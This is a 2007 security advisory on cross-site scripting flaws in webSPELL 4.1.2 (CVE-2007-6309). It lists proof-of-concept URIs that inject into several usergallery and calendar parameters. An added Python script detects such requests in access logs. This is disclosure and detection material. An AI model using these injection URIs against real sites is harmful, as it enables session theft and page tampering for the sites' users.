

Title: webSPELL Usergallery.PHP and Calendar.PHP Multiple Cross-Site Scripting Vulnerabilities
Published: 2007-12-10-12:00AM
Updated: 2008-01-03-02:10PM
Class: Input Validation Error
CVE: CVE-2007-6309
Remote: Yes
Local: No
Credit: Brainhead is credited with the discovery of these vulnerabilities.
Vulnerable: webSPELL webSPELL 4.1.2
Not Vulnerable:
Code: Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI. The following proof-of-concept URIs are available:

http://www.example.com/[PATH]/index.php?site=usergallery&action=upload&galleryID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code]
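An added example, not part of the original advisory or of webSPELL's code: a Python log check that flags requests to the site/action pairs and parameters named in the proof-of-concept URIs when a parameter value carries HTML metacharacters, including double-encoded ones. The combined access-log format, the sample lines and the XSSTEST marker are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters listed in the advisory's proof-of-concept URIs, keyed by (site, action).
AFFECTED = {
    ("usergallery", "upload"): {"galleryID"},
    ("calendar", "announce"): {"upID", "tag", "month", "userID", "year"},
}
# Characters needed to break out of an HTML attribute and open a tag.
HTML_META = re.compile(r'["\'<>]')
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return sorted names of affected parameters whose value carries HTML metacharacters."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    key = (query.get("site", [""])[0], query.get("action", [""])[0])
    hits = set()
    for name in AFFECTED.get(key, ()):
        for value in query.get(name, []):
            # parse_qs decodes once; decode again to catch double-encoded input.
            if HTML_META.search(value) or HTML_META.search(unquote(value)):
                hits.add(name)
    return sorted(hits)

def scan(log_lines):
    """Yield (line_number, url, parameter_names) for each flagged request."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            names = suspicious_params(match.group(1))
            if names:
                yield number, match.group(1), names

# Constructed sample log lines (not taken from a real server); the marker
# XSSTEST stands in for the advisory's "[your code]" placeholder.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2007:12:00:01 +0000] "GET /index.php?site=calendar&action=announce&month=12&year=2007 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [10/Dec/2007:12:00:05 +0000] "GET /index.php?site=calendar&action=announce&month=%22%3EXSSTEST HTTP/1.1" 200 5188',
    '192.0.2.12 - - [10/Dec/2007:12:00:09 +0000] "GET /index.php?site=usergallery&action=upload&galleryID=%2522%253EXSSTEST HTTP/1.1" 200 4310',
    '192.0.2.13 - - [10/Dec/2007:12:00:12 +0000] "GET /index.php?site=news&title=%22quoted%22 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, url, names in scan(SAMPLE_LOG):
        print(f"line {number}: {names} in {url}")
```

A hit only shows that a request matching the advisory's pattern reached the server; whether the value was reflected unescaped depends on the installed webSPELL version.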



Copyright 2007, SecurityDot
Thu, 17 Dec 2009 18:26:24 +0000
